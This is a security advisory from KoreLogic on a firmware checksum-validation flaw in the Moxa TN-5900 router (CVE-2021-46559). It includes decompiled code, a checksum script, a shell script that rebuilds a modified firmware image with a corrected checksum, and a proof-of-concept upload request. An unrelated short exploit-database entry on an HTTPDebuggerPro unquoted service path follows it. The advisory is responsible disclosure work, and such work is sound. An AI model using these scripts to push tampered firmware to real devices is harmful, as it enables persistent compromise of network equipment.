<pre><code>KL-001-2022-001: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability<br /><br />Title: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability<br />Advisory ID: KL-001-2022-001<br />Publication Date: 2022.01.28<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-001.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Moxa<br /> Affected Product: TN-5900<br /> Affected Version: v3.1 and prior<br /> Platform: Moxa Linux<br /> CWE Classification: CWE-354 Improper Validation of Integrity<br /> Check Value<br /> CVE ID: CVE-2021-46559<br /><br /><br />2. Vulnerability Description<br /><br /> Moxa TN-5900 v3.1.0 and prior uses an insecure method to<br /> validate firmware updates. A malicious user with access to the<br /> management interface can upload abritrary code in a crafted<br /> firmware image simply by replacing a CRC value in the image<br /> header.<br /><br /><br />3. Technical Description<br /><br /> Analysis on this vulnerability began when KoreLogic noticed that<br /> the Ssgl2_update_session_now function is immediately called<br /> when the URL /goform/web_fwUpload is given to the management<br /> application. The Ssgl2_update_session_now function will enable<br /> a session after authentication through the user interface.<br /><br /> undefined4 websSecurityHandler(longlong *param_1) {<br /> ...<br /> ...<br /> if (requestPtr[0x20] != 0) {<br /> ...<br /> ...<br /> field_1 = strncmp(in_t0,"/init.asp",9);<br /> if (CONCAT44(extraout_v0_hi_07,field_1) != 0) {<br /> field_2 = strncmp(in_t0,"/goform/web_fwUpload",0x14);<br /> if (CONCAT44(extraout_v0_hi_08,field_2) == 0) {<br /> Ssgl2_update_session_now(local_490);<br /> }<br /> lVar3 = Ssgl2_webmultisession_session_verify(local_490,auStack104);<br /> ...<br /> }<br /> }<br /> ...<br /> ...<br /> }<br /><br /> Reviewing the web_fwUpload function showed the code is used to<br /> update the operating firmware of the affected device. Before<br /> the firmware is accepted, it must pass a check. This check is<br /> provided through the Ssys_firmwareCheck function.<br /><br /> void web_fwUpload(longlong *param_1,longlong *param_2) {<br /> ...<br /> if (lVar1 == -1) {<br /> FUN_1200222c0(param_1,"../upgrade.asp","Firmware Upgrade Fail! Restart the device.");<br /> ...<br /> }<br /> else {<br /> printf("%s() buffer upload datalen = %d\n","web_fwUpload",*(param_1 + 0x39));<br /> ...<br /> ...<br /> }<br /> else {<br /> puts("Ssys_firmwareCheck");<br /> local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39));<br /> if (-1 < local_118) {<br /> local_118 = Ssys_writeProgram(lVar1);<br /> }<br /> if (local_118 < 0) {<br /> printf("%s() %d firmware check fail ret = %d\n","web_fwUpload",0x7c0,local_118);<br /> ...<br /> ...<br /> }<br /> ...<br /> }<br /><br /> The Ssys_firmwareCheck function checks that the kernel and<br /> file system have an expected length and that the provided<br /> image passes a checksum algorithm.<br /><br /> undefined8 Ssys_firmwareCheck(ulonglong param_1,longlong param_2,ulonglong param_3,ulonglong param_4) {<br /> ...<br /> if (param_2 == local_44._4_4_) {<br /> ...<br /> if (local_4c._0_4_ == 0x400000) {<br /> if ((uVar4 < 0x1800001) && ((uVar4 & 3) == 0)) {<br /> ...<br /> file_check_sum(param_1 + 0x20,local_4c._4_4_ + 0x400000,&local_50);<br /> uVar3 = 0;<br /> if (local_50 != local_3c._0_4_) {<br /> FUN_0010d230("[Error] %s L%d : Firmware checksum error (0x%x), should be 0x%x<br />\r\n","Ssys_firmwareCheck",0x484,local_50,local_3c._0_4_,extraout_t1_00,extraout_t2_00,extraout_t3_00);<br /> uVar3 = 0xfffffffffffffffc;<br /> }<br /> }<br /> else {<br /> FUN_0010d230("[Error] %s L%d : Rootfs length error (%d), max to %d bytes<br />\r\n","Ssys_firmwareCheck",0x47a,uVar4,0x1800000,extraout_t1,extraout_t2,extraout_t3);<br /> uVar3 = 0xfffffffffffffffd;<br /> }<br /> }<br /> else {<br /> FUN_0010d230("[Error] %s L%d : Kernel length error (%d), should be %d bytes<br />\r\n","common.c","Ssys_firmwareCheck",0x474,local_4c._0_4_,0x400000,extraout_t2,extraout_t3);<br /> uVar3 = 0xfffffffffffffffe;<br /> }<br /> }<br /> else {<br /> FUN_0010d230("[Error] %s L%d : Firmware file logo mismatch (0x0x), should be 0x%x<br />\r\n","Ssys_firmwareCheck",0x46c,local_44._4_4_,param_2,extraout_t1,extraout_t2,extraout_t3);<br /> uVar3 = 0xffffffffffffffff;<br /> }<br /> ...<br /> }<br /> <br /> The checksum is simple and implemented using the following algorithm:<br /> <br /> #!/usr/bin/env python3<br /> import sys<br /> from functools import partial<br /> from binascii import hexlify<br /> <br /> with open(sys.argv[1],"rb") as f:<br /> f.seek(0x20)<br /> checksum = int(0)<br /> for dword in iter(partial(f.read,4),b''):<br /> checksum += int(hexlify(dword),16)<br /> print (hex(checksum)[-8:])<br /><br /> A breakpoint was set on the file_check_sum function using GDB<br /> and the valid ROM provided by Moxa was processed. The result<br /> of the checksum process was retrieved.<br /><br /> Breakpoint 14, 0x000000fff6fac3a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so<br /> (gdb) x/1x 0xfffbf4ce30<br /> 0xfffbf4ce30: 0x2f43167a<br /><br /> The bytes 0x2f43167a were found in the ROM image itself inside<br /> of a header containing 0x20 bytes.<br /><br /> $ hexdump -C moxa-tn-5900-series-firmware-v3.1.rom<br /> 00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....|<br /> 00000010 2f 43 16 7a 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............|<br /><br /> The following script was constructed to disassemble and rebuild<br /> a firmware image using the expected format. The script will<br /> create a file /korelogic on the filesystem. The file will be<br /> zero bytes.<br /><br /> #!/bin/sh<br /> IF=$1<br /> OF=$2<br /> dd bs=1 if=$IF of=$IF.header_1 count=$((0x10))<br /> dd bs=1 if=$IF of=$IF.checksum skip=$((0x10)) count=4<br /> dd bs=1 if=$IF of=$IF.header_2 skip=$((0x14)) count=$((0x20-0x14))<br /> dd bs=1 if=$IF of=$IF.kernel skip=$((0x20)) count=$((0x1d9669-0x20))<br /> dd bs=1 if=$IF of=$IF.splitter skip=$((0x1d9669)) count=$((0x400020-0x1d9669))<br /> dd bs=1 if=$IF of=$IF.cramfs skip=$((0x400020))<br /> cramfsswap $IF.cramfs $IF.cramfs.swap<br /> sudo cramfsck -x fs $IF.cramfs.swap<br /> touch fs/korelogic<br /> mkcramfs fs/ $IF.cramfs.modified<br /> cat $IF.header_1 $IF.checksum $IF.header_2 $IF.kernel $IF.splitter $IF.cramfs.modified > $OF<br /> ./checksum.py $OF | xxd -r -p > check_value<br /> dd bs=1 conv=notrunc if=check_value of=$OF seek=$((0x10)) count=4<br /> <br /> Here is the script running.<br /> <br /> $ sudo ./make_moxa_image.sh moxa-tn-5900-series-firmware-v3.1.rom hacked.rom<br /> 16+0 records in<br /> 16+0 records out<br /> 16 bytes copied, 9.967e-05 s, 161 kB/s<br /> 4+0 records in<br /> 4+0 records out<br /> 4 bytes copied, 7.4433e-05 s, 53.7 kB/s<br /> 12+0 records in<br /> 12+0 records out<br /> 12 bytes copied, 0.000118918 s, 101 kB/s<br /> 1939017+0 records in<br /> 1939017+0 records out<br /> 1939017 bytes (1.9 MB, 1.8 MiB) copied, 3.76396 s, 515 kB/s<br /> 2255287+0 records in<br /> 2255287+0 records out<br /> 2255287 bytes (2.3 MB, 2.2 MiB) copied, 4.32499 s, 521 kB/s<br /> 21344256+0 records in<br /> 21344256+0 records out<br /> 21344256 bytes (21 MB, 20 MiB) copied, 40.8949 s, 522 kB/s<br /> Filesystem is big endian, will be converted to little endian.<br /> Filesystem contains 3313 files.<br /> CRC: 0x9b7eefd0<br /> 4+0 records in<br /> 4+0 records out<br /> 4 bytes copied, 7.4433e-05 s, 53.7 kB/s<br /><br /> The hacked.rom image is then processed and the same breakpoint<br /> is hit. The new checksum should be 0x0987aafc. The new checksum<br /> is patched into the hacked.rom image already from the above<br /> script.<br /><br /> $ hexdump -C hacked.rom<br /> 00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....|<br /> 00000010 09 87 aa fc 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............|<br /> <br /> GDB output confirms that the checksum is the same result:<br /> <br /> Breakpoint 2, 0x000000fff72853a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so<br /> (gdb) x/1x 0xfffbad34d0<br /> 0xfffbad34d0: 0x0987aafc<br /> <br /> When processing the hacked.rom image, we receive a new error.<br /> <br /> Firmware check failed, error occurs when write kernel to flash. Restart the device.<br /><br /> Comparing the indicated error against the pseudo-c indicates we<br /> have passed the firmware validation checks. This was confirmed<br /> using GDB as well.<br /><br /> void web_fwUpload(longlong *param_1,longlong *param_2) {<br /> ...<br /> if (lVar1 == -1) {<br /> ...<br /> }<br /> else {<br /> ...<br /> else {<br /> puts("Ssys_firmwareCheck");<br /> local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39));<br /> if (-1 < local_118) {<br /> local_118 = Ssys_writeProgram(lVar1);<br /> }<br /> ...<br /> }<br /> <br /> The error indicating a write exception is expected as we were<br /> not operating on a Moxa device but were instead emulating the<br /> Moxa firmware on a MIPS development board.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a patch which remediates the described<br /> vulnerability. Release notes are available at:<br /><br /> https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Matt Bergin (@thatguylevel)<br /> and Josh Hardin of KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2021.02.05 - KoreLogic submits vulnerability details to Moxa.<br /> 2021.02.08 - Moxa acknowledges receipt and the intention to<br /> investigate.<br /> 2021.03.02 - Moxa notifies KoreLogic that a patch for this<br /> vulnerability is expected to be available in June 2021.<br /> 2021.04.16 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.06.07 - KoreLogic requests update on the status of the<br /> proposed TN-5900 patch.<br /> 2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021.<br /> 2021.06.23 - 90 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021.<br /> 2021.09.22 - 150 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.21 - 210 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.27 - Moxa notified KoreLogic that the patch is complete and ready for release..<br /> 2021.12.28 - Moxa public acknowledgement.<br /> 2022.01.25 - KoreLogic requests CVE from Mitre.<br /> 2022.01.28 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> POST /goform/web_fwUpload HTTP/1.1<br /> Host: 192.168.10.10<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> Content-Type: multipart/form-data; boundary=---------------------------11395841764774651092787307532<br /> Content-Length: <HTTP REQUEST SIZE><br /> Connection: close<br /> Upgrade-Insecure-Requests: 1<br /> <br /> -----------------------------11395841764774651092787307532<br /> Content-Disposition: form-data; name="binary"; filename="hacked.rom"<br /> Content-Type: text/plain<br /> <br /> <HACKED.ROM FIRMWARE IMAGE><br /> -----------------------------11395841764774651092787307532<br /> Content-Disposition: form-data; name="submit"<br /> <br /> submit<br /> -----------------------------11395841764774651092787307532--<br /> <br /> HTTP/1.1 200 OK<br /> Server: GoAhead-Webs<br /> Pragma: no-cache<br /> Cache-control: no-cache<br /> Content-Type: text/html<br /> Transfer-Encoding: chunked<br /> <br /> <!DOCTYPE html><br /> <html><br /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><br /> <head><br /> <title></title><br /> </head><br /> <body bgcolor="#E8FFF7" text="#000000" topmargin="10" leftmargin="12" ><br /> <font size="2" face="Arial, Helvetica, sans-serif, Marlett"><br /> <p>Firmware check failed, error occurs when write kernel to flash. Restart the device.</p><br /> </font></body><br /> </html><br /><br /><br /><br />The contents of this advisory are copyright(c) 2022<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code># Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path<br /># Exploit Author: Aryan Chehreghani<br /># Date: 23/11/2021<br /># Vendor Homepage: https://www.httpdebugger.com<br /># Software Link: https://www.httpdebugger.com/download.html<br /># Version: 9.11<br /># Tested on: Windows 10 x64<br /><br />SERVICE_NAME: HTTPDebuggerPro<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : HTTP Debugger Pro<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>